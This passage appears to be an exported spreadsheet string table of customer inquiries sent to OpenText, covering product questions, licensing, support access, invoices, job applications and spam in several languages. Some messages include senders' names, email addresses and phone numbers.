im Zuge meiner Bachelorarbeit berate ich die o.g. Firma im Bezug auf die Einführung eines ersten Digitalen Systems im kleinen Familienbetrieb. _x000D_
Es wird hier ein Dokumentenmanagementsystem gesucht._x000D_
Hierzu möchte ich Sie bitten mir weitere Details über Ihre Software anzubieten. _x000D_
Derzeit arbeite ich an dem Vergleich verschiedener Systeme, welche eventuell in Frage kommen. _x000D_
Bitte stellen Sie mir Ihre Vorteile kurz dar in Bezug auf:_x000D_
- Schnittstellenintegration_x000D_
- Workflowgestaltung_x000D_
- individuell durchzuführende Berechnungen, wie Stückzahlenlisten, automatische Rechnungserstellung (daraus Rechnungssummen)_x000D_
- Kostenstruktur_x000D_
- Servicemöglichkeiten_x000D_
_x000D_
Hierzu noch ein paar Infos:_x000D_
_x000D_
Das Unternehmen ist in der Branche der Automobilzulieferer tätig und möchte sich nun weiterentwickeln._x000D_
Es handelt sich um ein Unternehmen &lt; 20 Mann _x000D_
Umsatz &lt;1 Mio € _x000D_
Lizenzen ca. 3 Stk._x000D_
eventuelle Einbindung eines ERP Systems in den nächsten 5-6 Jahren._x000D_
_x000D_
Vielen Dank im Voraus_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Tommi Dittmann_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a document management solution where we can integrate our own custom UX or workflow (as appropriate) into our custom SaaS applications._x000D_
So would like to discuss our requirements and see if your solution can help meet our needs._x000D_
</t>
  </si>
  <si>
    <t>Good afternoon._x000D_
I would like to be contacted by your Portuguese sales team._x000D_
_x000D_
Thank you._x000D_
Kind regards,_x000D_
Bruno R Santos.</t>
  </si>
  <si>
    <t>I am looking for a role within open text. I have over 9 yrs of experience in HRIS. I am available to join immediately. Kindly let me know if there is any suitable openings in your company.</t>
  </si>
  <si>
    <t>Need some help finding out how to get the sync module working on my test RightFax 16.4.2 server. As well as the SSO for the FaxUtil Web.</t>
  </si>
  <si>
    <t>Hello,_x000D_
Could you please explain to me how is technically working the "seats" licences for Brava Desktop? Is it a computer attached licence?_x000D_
Thank you for your response</t>
  </si>
  <si>
    <t>My name is Han Chen and I work for Canadian Pacific Railway train control technical team. We are using Open Text Exceed 14 in our company. Recently we have started to see the Exceed process crashed problem more often on our new Win10 machines. _x000D_
_x000D_
Further information feel free to call/email me _x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Set up billing on recurring credit card charge</t>
  </si>
  <si>
    <t>How can I gain access to a vendor portal, and obtain vendor/routing guides.</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon, _x000D_
_x000D_
We are exploring the impact of the changes to Java licensing for our software portfolio. Please would it be possible for you to clarify whether Exceed &amp; 3D_x000D_
_x000D_
1)            Utilises Java and how it utilises it (e.g. is it embedded?)_x000D_
2)            Which version it uses and the roadmap for future software releases and which version of Java they will be using_x000D_
3)            Will the software work with OpenJDK?_x000D_
4)            Will we be required to purchase Java licences to utilise the software?_x000D_
5)            Will the Java licencing be covered by the supplier?_x000D_
6)            Doe sthe software utilise Java Web Start_x000D_
_x000D_
Any assistance would be much appreciated_x000D_
_x000D_
Julia_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Running Disaster Recovery on a CPU that needs the keys updating as all programs running EXstream are failing with RC=20</t>
  </si>
  <si>
    <t>I am trying to setup a call with the support, but haven't heard from him till now.</t>
  </si>
  <si>
    <t>I have a question on Invoice 9001001545.  You have an SOW list as the PO number.  I need the actual PO number in order to process this invoice for payment.</t>
  </si>
  <si>
    <t>Is it possible to procure a trial version of Case 360 for evaluation/testing purposes?</t>
  </si>
  <si>
    <t>Hi,we have one of our customers requesting us to renew their encase endpoint investigator. I would like to know if we can sign up and procure the licenses through you.</t>
  </si>
  <si>
    <t xml:space="preserve">Agradecemos nos realicen una presentación de como funciona el servicio de OpenText, para revisar la viabilidad de ser adquirido por nuestra empresa. </t>
  </si>
  <si>
    <t>Looking at all of the changes in ownership of the Documentum platform in recent years, I would like to get an updated licensing terms and conditions.  I am specifically interested in the licensing of the REST api which may or may not include a licensing definition of indirect access.</t>
  </si>
  <si>
    <t>We have OpenText Archive Server.  Is it possible to retrieve and view an archived document, without logging in to SAP?  If so, how?  And with what tool?  We have OpenText Windows Viewer and WebViewer.</t>
  </si>
  <si>
    <t>Cigna is using OpenTextExstream 9.5 now to replace hp Exstream 8.03. After installed 9.5 in Win 10, click Design Manager, I got Message: "This version of Exstream requires database version 905301 and the database you are trying to open is version 800301. Your database needs to be updated. Please update it with DBAdmin_dbcs.exe before attempting to continue." I could not find anywhere where DBAdmin_dbcs.exe is located. Can you help?_x000D_
Thanks_x000D_
James</t>
  </si>
  <si>
    <t>I have 5 databases on a server all of them are developed in GuptaSQL. From last 2-3 weeks, I am getting "Error : 01315 MFE DBD database has been shut down (Please disconnect)" on one of my database while checking all databases overnight as scheduled. I am sure that server is up and running. Kindly give your suggestion in this case.</t>
  </si>
  <si>
    <t>Please let me know when the current Blue Hills Bank annual term for fax2mail ends._x000D_
Thanks,_x000D_
Rob</t>
  </si>
  <si>
    <t xml:space="preserve">We work with ISO and we also publish standards.  The dashboard ISO uses I believe is OpenText - curious if what they use interfaces with SharePoint (we are an O365 shop).  Would like to share the URL so you can see what I'm referring to.  Interested in what you've done for them. _x000D_
</t>
  </si>
  <si>
    <t>I am President of a Medicine National Students Association and we operate with First Class Reflex. at . Our main account is ANEM Admin and we have a conference called "Mesa da Assembleia Geral". Unfortunately I moved "All Users" from Permissions to first place and All Users have now the status of Contributor, ANEM Admin included. Therefore, we now cannot change any definitions in the conference in our administrator account. We ask for your held to solve this problem as we cannot do it on our own. Thank you very much. Best regards, Vasco Mendes, ANEM's President.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
J'ai reçu une facture de la part d'EasyLink (N°144849) adressée à Philippe LI MOW CHING qui a quitté notre société et dont j'ai repris le poste. Cette facture concerne un service de fax to mail, référence client 81116._x000D_
_x000D_
Pourriez-vous me communiquer les numéros de fax associés à ce contrat, s'il vous plaît ? Car je suis à la recherche de l'information en interne mais personne ne semble connaître._x000D_
_x000D_
Je vous remercie d'avance pour votre réponse._x000D_
_x000D_
Cordialement,</t>
  </si>
  <si>
    <t>hello_x000D_
i want to evaluate Exceed VA TurboX , but your web form to fill to try it is not working._x000D_
How can i proceed ?_x000D_
best regards_x000D_
marc</t>
  </si>
  <si>
    <t>Dear Sir,_x000D_
_x000D_
I want to download opentext Version 16.2. I think I am not registered by your Company._x000D_
The previous colleague Mrs. Falkenburger has left the Company. So please rgister my Name in oder to have Access to download page.</t>
  </si>
  <si>
    <t>Looking to purchase RightFax solution to integration with EHR, Netsmart Homecare.</t>
  </si>
  <si>
    <t xml:space="preserve">I need the following invoices emailed to me:_x000D_
9000777396_x000D_
9000921885_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>G3002095433 We have purchased our software where can we receive updates and support portal we have been trying to access the latest versions and our portal for months .. please help</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText_x000D_
_x000D_
There is a project with ministry of justice and we are going to cover around 50 locations in the first phase and this number will be multiplied to reach hundreds of locations._x000D_
_x000D_
1.       AI (Artificial Intelligent) solution, so that it can learn different accents over time._x000D_
2.       Must support Arabic language with high percentage of accuracy over time._x000D_
3.       The converted text can be edited instantly by the notary at time of conversation._x000D_
4.       It can be integrated with 3rd party applications (Like Najiz) through APIs._x000D_
5.       Can accept the audio from dedicated microphones._x000D_
6.       The ability to differentiate between different speakers._x000D_
7.        Unlimited hours of speaking.  _x000D_
_x000D_
In addition:_x000D_
This is part of a Digitization of Judicial Hearings project of the Ministry where they want to achieve:_x000D_
•	Remote trial (Remote Accused  connected through video conference to the court)._x000D_
•	Recording of the court session._x000D_
•	Archiving._x000D_
•	Speech to text with the below details._x000D_
•	While the judge and the others are talking the speech to the text system should convert the speech into a screen where a notary is setting and editing the text then this system should learn through AI._x000D_
_x000D_
Should your solution provide these features, please send us your techno-commercial proposal as soon as possible as we are running out of time. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Greeting from Business City KSA._x000D_
_x000D_
We would like to know more about your solutions and the partner programs?_x000D_
_x000D_
Looking forward to your response._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I have several question about EnCase Forensic SW before I buy it._x000D_
_x000D_
1. Select Re-seller issue_x000D_
I work in South Korea. But I'm doing my projects JPN and USA also._x000D_
In this case, where do I have to buy Encase Forensic SW?_x000D_
_x000D_
2. Type of license_x000D_
I got the information about Encase forensic SW from one of Korean site._x000D_
According to that site, the package made as below._x000D_
_x000D_
1 yr System Management Service_x000D_
1 USB dongle_x000D_
1 time user training._x000D_
_x000D_
If I buy SW as 1 copy - those conditions for 1 PC or 1 user?_x000D_
If I change PC or laptop, how can I transfer the license?_x000D_
_x000D_
3. User training info._x000D_
_x000D_
the info. above - 1 time user training._x000D_
Do I have any detail info. about agenda or detail of it?_x000D_
If the person dose not have any experience about Encase Forensic SW, how many hours required for beginner?_x000D_
_x000D_
4. License for team usage_x000D_
_x000D_
I'm planning to make a Team for digital forensic project._x000D_
A Team member with 3 person._x000D_
In this case, how can I organize the SW license? any suggestion?_x000D_
_x000D_
Thank you. </t>
  </si>
  <si>
    <t>One of our customers needs a content management solution. I came across your website and would like to partner and submit rfp response based on your product. Kindly let me know if you find it interesting. Regards.</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning,_x000D_
_x000D_
I am one of the lawyers in Nouryon's legal team. Nouryon is the former special chemicals division of Akzo Nobel that was acquired by Carlyle last year. We are looking for a cloud based document management system for the legal team (consisting of about 50 lawyers). Main purpose is so that we are on top of version control, but also to generally store the archives of the legal team. Our general counsel Michael Finn has recently joined from Axalta and is therefore familiar with Edocs. _x000D_
_x000D_
Would it be possible to send through a proposal for Edocs with proposed pricing, IT requirements and information about the roll-out process (both from IT perspective and training sessions). _x000D_
_x000D_
Below the type of DMS we are looking for:_x000D_
_x000D_
- cloud based_x000D_
- 50 users_x000D_
- Windows 10 systems_x000D_
- no email filing system needed_x000D_
- DMS needs to be able to save word, PDF, excel and powerpoint_x000D_
- versions need to be tracked and older versions can be recovered_x000D_
- ideally compatible with Workshare (compare program used by some members of our team)._x000D_
- legal team is based globally (US, China, Netherlands, Sweden)._x000D_
_x000D_
Many thanks in advance._x000D_
_x000D_
Best,_x000D_
_x000D_
Maarten_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Sir/Ma'am,_x000D_
_x000D_
Greetings for the day!_x000D_
_x000D_
I would like to apply for the eligible openings._x000D_
_x000D_
I have work experience of 3 years 3 months in the Construction Industry. _x000D_
My key skills are Site Engineer, Billings, Estimates, Building Layout, etc. _x000D_
_x000D_
You can contact me at your convenience to the undersigned contact details. I would like to hear from you soon, in this regards._x000D_
_x000D_
Thanking You,_x000D_
_x000D_
Yours Sincerely,_x000D_
Vikas Singh_x000D_
Ph no: 8390889663_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I am having some account issues with my OT account. I appear to be registered under 2 email addresses, _x000D_
1. james.brown@derbyshire.gov.uk_x000D_
2 james.brown2@derbyshire.gov.uk_x000D_
_x000D_
The 2nd is an alias of the first and was initially used as my primary email address but now my business email address is just the 1st one. _x000D_
_x000D_
I still have access to both to prove they are both mine. Could james.brown2@derbyshire.gov.uk be deleted. _x000D_
_x000D_
secondly, I am having trouble accessing the Knowledge Base, it says my account does not have access but I should do through the business, is this a separate issue or linked to the two email addresses ? _x000D_
Kind Regards,_x000D_
_x000D_
James.  </t>
  </si>
  <si>
    <t>I need Support. How can I submit a ticket?</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour_x000D_
_x000D_
Mon client Aviva a besoin en urgence d'une offre pour une licence Licence Captiva Dispatcher v6SP1 &amp; maintenance_x000D_
j'ai contacté mon grossiste habituel (ARROW) , ils ne distribuent pas cette gamme_x000D_
j'ai contacté mon correspondant Opentext : il ne connait pas ce produit_x000D_
_x000D_
êtes vous en mesure de m'aider_x000D_
La demande est extrêmement urgente , le client a besoin de passer une commande pour être livré Mercredi_x000D_
_x000D_
existe t'il une trail version ?_x000D_
_x000D_
_x000D_
Cordialement_x000D_
_x000D_
_x000D_
Noralia </t>
  </si>
  <si>
    <t>We are planning to move our opentext WMS and Delivery server 11 to opentext 16. We would like to know all the advantages of this update. Please direct me to a document which shows me all these reports</t>
  </si>
  <si>
    <t xml:space="preserve">Wir haben einen Servicevertrag mit Ihnen und einen Reneval RC 333521 Contract Nr: 30111688D Wir benötigen den Download des Rest-Service für Documentum. _x000D_
Bitte schalten sie hierzu auch den Produktbereich frei den wir lizensiert haben.  Mit freundlichem Gruß H. Post  </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
IBM Business is looking forward to procure Open Text SOCKS client for remote connection._x000D_
We need to contact right focal from Opentext who can help us with the quotes. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I need an access to the customer support (Documentum), related to contract C4023C0850 ._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Good Morning_x000D_
_x000D_
I'm having difficulty creating a technical ticket this morning. I have raised tickets through the website before and have been registered for several years. However I seem to be stuck in a loop where I try to open a technical ticket, the website insists I have not completed registration and must confirm my e-mail. I've had an e-mail, sent to confirm, click the link, the website says my account is confirmed, I go to log a ticket and I'm back at the Confirm Registration page._x000D_
_x000D_
Can someone please let me know what is going on and what I need to do to be able to log a ticket._x000D_
_x000D_
Thanks_x000D_
_x000D_
Martin</t>
  </si>
  <si>
    <t>Good Day _x000D_
_x000D_
I would like to request an email address where i can send a request for quotation to for the open text documentum._x000D_
_x000D_
Thank you _x000D_
Tuletu Ngqolowa</t>
  </si>
  <si>
    <t>Renewal of OpenText.eDocs licenses for RTA Enterprise Document Management System (Edocs DM (800 license)) from 1 April 2019 to 31 March 2020 _x000D_
_x000D_
Renewal of OpenText.eDocs licenses for RTA Enterprise Document Management System (Edocs DM (800)) from 1 April 2020 to 31 March 2021 _x000D_
_x000D_
End Customer is Roads and Transport Authority Dubai UAE.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team,_x000D_
_x000D_
This is regarding my access authorization to create/view incidents in OT._x000D_
_x000D_
Yesterday, had raised the request online and didn’t find any response back._x000D_
_x000D_
Please, can you look into this and do the needful at the earliest._x000D_
_x000D_
Name: Manjunath Boraiah_x000D_
Client : DHS_x000D_
Email address : Manjunath.boraiah@humanservices.gov.au_x000D_
_x000D_
Reference account : _x000D_
Apparao Sanam / Warwick_x000D_
</t>
  </si>
  <si>
    <t>Hi_x000D_
We can help your website to get on first page of Google and increase the number of leads and sales you are getting from your website. Please email us back for full proposal._x000D_
_x000D_
Best Regards_x000D_
Kathy</t>
  </si>
  <si>
    <t>We are interested to increase traffic to your website, please get back to us in order to discuss the possibility in further detail. Please mention your phone number and suitable time to talk.</t>
  </si>
  <si>
    <t>Please quote me a price for the current version of SQLBase - Unlimited Users.</t>
  </si>
  <si>
    <t>Yes</t>
  </si>
  <si>
    <t>Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to be connected to your Technical Head. We are a Software developing company with more than 10 Years of successful experience to our credential. _x000D_
We are interested in partnering with your company, to be chosen as your Software Development partner. We can use the Right Resource for the Right Job, with Right Skill which can reduce your effort and cost. </t>
  </si>
  <si>
    <t>I am standing up a new forensics capability within my organization and I am conducting market research on tools that will meet our needs.  Until now I’ve been using Autopsy and Sleuthkit, however, they’re not cutting it these days.  I’ve been researching tool sets and it seems to be down to X-Ways Forensics, AccessData Forensic Tool Kit, and EnCase as the big players.  I would like to know if you offer a trial of some sort that I may spend some time with the tool and compare it against the others for our particular needs?</t>
  </si>
  <si>
    <t>I have applied for Account Executive Sales, Enterprise Sales Malaysia, Kuala Lumpur_x000D_
Job Id - 22348 on 12th February via LinkedIn. _x000D_
_x000D_
But now I am unable to see my application. Page is throwing some error. And I am unable to open it.</t>
  </si>
  <si>
    <t>Dear Open Text team,_x000D_
_x000D_
We would like to request for a demo session in Singapore to better understand how the Enterprise Content Management (ECM) solution (e.g. Captiva) can assist Finance Shared Services Centre in managing and processing large volumes of incoming vendor invoices and potentially reduce processing cost. We would also like to understand the other functionalities of the solution that may help Finance Shared Services improving productivity in the areas of AP, AR and Reporting. Looking forward to hearing from you, thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking to install a DMS for our upcoming Project. The DMS should feature document storage and collaboration. We have locations in the US, Canada and Europe collaborating, and will need a bidirectional transmittal interface to our customer's DMS. Number of users 50 to 200. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I have been told by your support team that I need to_x000D_
"Please open a new ticket with our CSR, to grant you the access to Knowledge Base, after that you should be able to view/download those documents."_x000D_
_x000D_
Thanks,_x000D_
Andrew</t>
  </si>
  <si>
    <t>I have Dongle Number G3002089202. Support expired and I need a quote for renewal. I also need links to the downloaded files to install 8.05 Which I had installed on my previous computers. This is a second email. I need the install files ASAP! The links in the email I received during registration no longer work. You can also reach me at kerri@calutechdigital.com_x000D_
_x000D_
Thank You,</t>
  </si>
  <si>
    <t>Our company JABA USA located in Los Angeles CA. Wondering how can we become your supplier? We are the manufacture of home textile in China. We are produce comforter set, sheet set, window curtains etc. Currently supplying to many department stores like Macy's, BBB, Walmart, Target etc. Can you please direct me to your buyer and I can email some catalogs. Thank you!</t>
  </si>
  <si>
    <t>can not get access to support section to pay bill online and to the center, confirmed registration via email</t>
  </si>
  <si>
    <t>I received a collection email from OpenText today that appears to be fake, but not sure. It shows over $100 going into collections. All I have is Fax2Mail, which I "think" was bought by your firm. All of the invoices I show back to March 2018 are for literally pennies._x000D_
_x000D_
Also, I had to change credit cards several times because Xpedite was hitting me with $1 charge then more. My bank saw it as fraud and agreed with me. My profile and billing for Fax2Mail appears to be correct, except the card, which appears to be expired._x000D_
_x000D_
And just tried to call Customer Support and was hung up on without ever reaching anyone._x000D_
_x000D_
Please call on the business phone listed and explain this situation.</t>
  </si>
  <si>
    <t>I'm trying to find out if we have a support agreement with OpenText or any contract document relating to our Active Catalog.  Account number is: 128585271500</t>
  </si>
  <si>
    <t>Need to get an invoice to renew Encase forensics</t>
  </si>
  <si>
    <t>do you still make the following parts?  TC4-8, T8R2, TC10-8, TC3-8, TC7-9-9, TC9-1M, TDP-8</t>
  </si>
  <si>
    <t>Hi There, _x000D_
_x000D_
Do you happen to know who our account rep is with Open Text? We had a couple of questions around some capabilities and such. Previously we have worked with Troy Hooks, but I believe he may be a partner of yours rather than our actual account rep._x000D_
_x000D_
Thanks,_x000D_
Kristen Stevenson</t>
  </si>
  <si>
    <t>We are currently using HummingBird to connect using a TN3270 emulation to one of the Oregon mainframes.  It is going to be a requirement that we use TLS 1.2 to connect in the future.  Is there an option to update Hummingbird 2007 to do this?  Does your OpenText HostExplorer support TLS 1.2?  Thank you.</t>
  </si>
  <si>
    <t>Afternoon,_x000D_
_x000D_
Mission Support Alliance would like to procure Open Text Auto Classification Module. Are you able to confirm that I may list this on NASA SEWP for a Request for Proposal / Solicitation? I see one of your resellers of this product is listed on SEWP. _x000D_
_x000D_
Thank you so much, _x000D_
Errika</t>
  </si>
  <si>
    <t>We are using the old Actuate IServer 8.0. I am wondering if you have newer version of it and if it is worthwhile for us to upgrade to a newer version. Thanks!</t>
  </si>
  <si>
    <t>I am looking into getting the single user learning on-demand. I was wondering if you offer an enterprise license for 'x' amount of users?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
_x000D_
Please align Engineer to whom we can talk  regarding upcoming activity OpenText Fax2Mail/Mail2Fax Certificate Update Notification: SSL/TLS Certificate Update 21 February 2019 Activity._x000D_
_x000D_
Please log a case for the same as well._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>1. How do you handle images if they have confidential information to be removed?_x000D_
2. How does it function your integration with sharepoint on line?_x000D_
3. Do you use any kind of artificial intelligence to automatically remove data?_x000D_
4. Can all the functionalities be automated?_x000D_
5. Do we have any loss in pdf documents during transformation?</t>
  </si>
  <si>
    <t>Is there a Grammar/Parser/Lexer for OpenText Gupta ACCELL/SQL?_x000D_
_x000D_
I'm Interested in parsing Accell code</t>
  </si>
  <si>
    <t>01. How do you handle with images if we want to remove confidential information from it?</t>
  </si>
  <si>
    <t>I would like some information on the iHub.  If you have a demo, that would be great.</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to request a demo of document redaction software. Thank you. </t>
  </si>
  <si>
    <t>UA</t>
  </si>
  <si>
    <t>Hi! In September, our company purchased Encase Forensic software. USB-key is available. Please tell me how to download the installer? I have already registered an account on the site. As I understand it, then we need to request access to MySupport site. But we are required to specify the following data: End user number, Name of co-worker, System ID/serial number/PIN/VPS. Tell me please where to get this information?</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to create an account in order to promote my US patented electro-mechanic new product to the market  via BestBuy platform channel </t>
  </si>
  <si>
    <t>Good morning,_x000D_
I use version 16.108 of the First Class client._x000D_
If I click on an FTP link in the text of a message, the client closes without opening the browser. If instead I copy and paste the link in the browser's address bar, everything works perfectly._x000D_
It is probably a bug on First Class Client._x000D_
Is there a correction?_x000D_
Thank you_x000D_
Andrea</t>
  </si>
  <si>
    <t>Looking for a Document Management Solution for a small law firm, 10-15 lawyers.</t>
  </si>
  <si>
    <t>Hello, I am interested in the EnCase training course starting May 14, 2019 in Pasadena CA for Building an Investigation with EnCase.  It is the 210 level course.  I have two questions:_x000D_
1- how many seats are still available for the class?_x000D_
2- is it possible to book the class while waiting for my EnCase passport and then later add this class as part of my passport?_x000D_
_x000D_
Thank you for your help,_x000D_
Ryan</t>
  </si>
  <si>
    <t>I have forgotten my login information for faxadmin</t>
  </si>
  <si>
    <t>BW</t>
  </si>
  <si>
    <t>Good day, i am an an IT consultant and I am interested in the Enterprise Information Management System to deploy to some of my clients. If you can provide more information, that would be much appreciated.</t>
  </si>
  <si>
    <t xml:space="preserve">We're interested in brand management/DAM software to help us centralize brand assets, increase consistency, and share best practices across Kaplan's business units. _x000D_
_x000D_
All of our business units pull from our corporate brand guidelines to create their own brand guidelines, so the right solution will allow for multiple versions of brand guidelines/standards, with different users gated into different versions.  The software should be:_x000D_
Cloud-based_x000D_
GDPR compliant_x000D_
Able to tag photos/assets by mood/type/subject_x000D_
Configured with editing tools (resize, reformat, convert images) and workflow for approval and permissions_x000D_
We have a few security-related questions to kick off with:_x000D_
Do you have standard security provided to all clients, or is it tailored to each client? _x000D_
Are your systems, requirements audited by independent third parties and are these available to us? _x000D_
Do you have any security reports you can share? (SOC reports or an ISO 27001 certification, for example). _x000D_
Once we have the security questions answered, we'd like to see a proposal that shows pricing that includes storage space options._x000D_
</t>
  </si>
  <si>
    <t>I am trying to gather CPE (Continuing Professional Education) credits from my attendance at the EnFuse conferences the last two years. (formerly hosted by Guidance Software).   Is there a way to receive official documentation from OpenText/Guidance Software?</t>
  </si>
  <si>
    <t>Would like to know what the current version number is for the Open Text Host Explorer software?</t>
  </si>
  <si>
    <t>Hi - we have previously purchased 'Secure Terminal' in order to get a SCO-ANSI compatible terminal emulator for our Linux servers. We have 20 max users. I can't find this product now, only the full 'Host Explorer' product. Is Secure Terminal still available ?. EIther way - the guys that will install the software (its on a shared windows server) have also asked 'how long is the software supported and how are updates released' - many thanks</t>
  </si>
  <si>
    <t>I received an email saying i have a balance.  I don't know who your company is, can you please let me know what invoice 9000923187 is for, reference doc 1901782292</t>
  </si>
  <si>
    <t>I am not able to validate my registration for my email account for OT support = misael.breton@tcs.com</t>
  </si>
  <si>
    <t>We have a new credit card that we would like to keep on file. Can you please send us the form that needs to be filled out to do so.</t>
  </si>
  <si>
    <t xml:space="preserve">we are interested in ur ECM for life science ,_x000D_
please give us idea about the cost on premise _x000D_
25 user _x000D_
_x000D_
AHMED mobile. _x000D_
_x000D_
00967777777762_x000D_
</t>
  </si>
  <si>
    <t>I would like to be able to contact your legal department regarding an administrative subpoena.  I represent a law enforcement agency and we have a phone number that has come back to you as a provider.  Please advise?</t>
  </si>
  <si>
    <t>Hi, we have received 2 invoices from you - refs RC389024 and RC419144. They are for the same product but the time periods overlap. Ref 389024 ha been paid. Please advise._x000D_
Kind regards, Claire</t>
  </si>
  <si>
    <t>I'd like to get more in-depth information about OpenText.  At EIS Group, we provide core software to large and mid-tier insurance carriers.  Our customers include AIG, AAA, Guardian and Desjardins, and we are recognized as a "visionary" by Gartner in the P&amp;C Core Insurance Systems space.  You can find out more about us on our website._x000D_
_x000D_
We currently have a document generation solution embedded in our product, but are looking to replace it. We are looking for a partner who has a document generation, delivery and storage solution that is scalable, easy to implement and integrate with, and cost-effective for both EIS and our customers.  _x000D_
_x000D_
Please connect me with the right person so we can start the conversation.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Nous souhaiterions pouvoir obtenir une proposition commerciale (et le contrat associé) pour une licence OpenText Captiva Intelligent Enterprise._x000D_
_x000D_
Voulez-vous bien me l'adresser?_x000D_
_x000D_
Vous en remerciant par avance,_x000D_
_x000D_
Cordialement,_x000D_
Matthieu Browaeys_x000D_
AVIVA_x000D_
06 80 48 88 85</t>
  </si>
  <si>
    <t>Instead of yearly renewal, do you guys offer month-to-month options?</t>
  </si>
  <si>
    <t>I am in need of a new license for the Actuate BIRT Designer Professional, so I can continue to maintain our existing (and create new) information objects for use with our iServer.  My PC has been replaced, and I do not have my original key to be able to provide as reference.  Our organization used to be known as Brandon Regional Health Centre, but is now Prairie Mountain Health (not sure how our customer profile is configured).  Would it be possible to receive the documentation required to fill out, to be able to request a new license key, so I may install the designer on my new PC?_x000D_
_x000D_
Thank-you._x000D_
_x000D_
Thomas Inkster</t>
  </si>
  <si>
    <t>Hi, I'm looking for confirmation regarding whether our current version of OpenText RKYV will run on Windows Server 2012 R2. Our current version is 9.1 x8.2.1 but this runs on Windows Server 2003 and we would like to upgrade the operating system to Windows Server 2012 R2._x000D_
Many thanks_x000D_
Peter Lunt_x000D_
Solution Architect_x000D_
Riverside Group</t>
  </si>
  <si>
    <t>Estamos em fase de estudos para implantar o ECM nos processos da Honda Serviços Financeiros. Gostaríamos de marcar uma reunião para conhecermos a solução da OpenText._x000D_
Obrigado e aguardo contato.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to activate my MY SUPPORT account but despite getting the Activation email, it still will not activate. I have Encase licenses from our previous venture, Omnivere, and I'd like to apply one of the license to my new account so I can update the software. Can I please have assistance with this as soon as possible? I have a pressing engagement and I've emailed 3 times in the past 3 hours with no response. </t>
  </si>
  <si>
    <t>I would like to open a pdf sent to me in my email it will not open in downloads</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon Team,_x000D_
_x000D_
Allow us to introduce to you, our company, ALLIANZ CYBER SECURITY INDIA PRIVATE LIMITED._x000D_
_x000D_
Allianz Cyber Security India Private Limited (ACSIPL) is a registered company specializing in Cyber Security services. We understand the requirements of our business, corporate and government clients and taking cognizance of the same we have decided to add another (Digital Forensics) vertical to our business. Wherein, not only we would be providing forensics as a services to our customers, but will also participate in government tenders, duly covering the demands of our corporate clients, for the supply, installation and training on products of forensic importance._x000D_
_x000D_
In this endeavor, we request your valuable support and are willing to get on-board (as a country partner) with your esteemed organisation to help develop business in India, thereby, leading to growth of both the entities. _x000D_
_x000D_
We, hereby, would request you to look into our request on priority. Should you need any further information, please do not hesitate to contact us._x000D_
 _x000D_
Thank &amp; Regards_x000D_
_x000D_
Dinesh Gaur_x000D_
+91-9818923201_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to know if our contract is still valid? I am unable to get to mysuporrt and download updates for EnCase. </t>
  </si>
  <si>
    <t>Ive tried to validate my email several times to get access to the knowledge base with no success; please advise? Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Hell Guys,_x000D_
_x000D_
Can I have a trial version of exceed for a week?_x000D_
_x000D_
thanks in advance_x000D_
_x000D_
Regards,_x000D_
Iskandar Mammadov_x000D_
Baku, Azerbaijan </t>
  </si>
  <si>
    <t>Bonjour, _x000D_
Je souhaite avoir des informations sur vos prestations._x000D_
Bien cordialement, _x000D_
Emilie TREGUIER</t>
  </si>
  <si>
    <t>Dear Opentext staff_x000D_
We are still using your product Firstclass (16.1, Build 3531)._x000D_
There was no update since quite some time (2 years?) and officially there is still no support for Windows 2016 (you still recommend Windows 2012)._x000D_
So we are wondering if there are still some upgrades, new releases on your roadmap or will you cease Firstclass as a product (sad but fully understandable)?_x000D_
We are looking forward to your honest answer._x000D_
_x000D_
Thank you and best regards from Switzerland_x000D_
Fritz</t>
  </si>
  <si>
    <t xml:space="preserve">Internship </t>
  </si>
  <si>
    <t>I want to kindly ask you about the procedure to take for having an internship opportunity at your esteemed company._x000D_
Many thanks in advance</t>
  </si>
  <si>
    <t xml:space="preserve">Our registered number with Easylink is 516-213-7769 . We trying to verify the identity of the following fax: _x000D_
_x000D_
"Sent: Saturday, February 09, 2019 4:20 PM _x000D_
Subject: Fax From: 0450438190407677800_x000D_
Thank you for using EasyLink's Fax to E-mail service._x000D_
Attached is a 1 page fax that you received on Sat Feb 09 04:20:02 PM EST."_x000D_
_x000D_
Can you provide as much information possible as to the origin of this fax? Thanks in advance._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Sales,_x000D_
_x000D_
As you may know, SYNNEX Corp. is a North American IT distribution company, supplying hardware and software vendors to reseller customers and not directly to end users. _x000D_
_x000D_
May I request a renewal quote for the following? Please advise if you offer distribution/reseller discounts._x000D_
_x000D_
Contract Number: 0012270135_x000D_
Maintenance Term Start Date: 4/1/18_x000D_
Maintenance Term Expiration Date: 3/31/19_x000D_
_x000D_
End User Information:_x000D_
Huntington Ingalls Industries - EU0158465_x000D_
Ingalls Shipbuilding Division 1000 Access Road_x000D_
